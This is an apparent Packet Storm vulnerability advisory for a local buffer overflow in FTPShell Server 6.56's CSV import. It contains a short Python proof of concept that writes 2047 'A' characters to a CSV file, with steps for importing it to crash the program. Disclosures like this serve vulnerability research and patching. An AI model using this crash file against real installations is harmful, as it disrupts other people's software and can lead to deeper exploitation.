FTPShell Server 6.56 Import CSV Buffer Overflow

2017-03-24T00:00:00
ID PACKETSTORM:141819
Type packetstorm
Reporter Nassim Asrir
Modified 2017-03-24T00:00:00

Description

                                        
                                            `[+] Title: FTPShell Server 6.56 - Import CSV Buffer Overflow  
[+] Credits / Discovery: Nassim Asrir  
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/  
[+] Author Company: Henceforth  
[+] CVE: N/A  
  
Vendor:  
===============  
  
www.ftpshell.com  
  
  
Download:  
===========  
  
http://www.ftpshell.com/download.htm  
  
  
Vulnerability Type:  
===================  
  
Local Buffer Overflow.  
  
  
POC:  
======  
Dos = "A"*2047  
file=open("C:\\shell.csv","w")  
file.write(Dos)  
file.close()  
  
1 - Manage FTP Accounts => Import From CSV = > Browse and import shell.csv = > Click in Import and Crashed :).  
  
CVE Reference:  
===============  
  
N/A  
  
  
Tested on:  
===============   
  
Windows 7  
  
Win xp   
  
  
  
  
`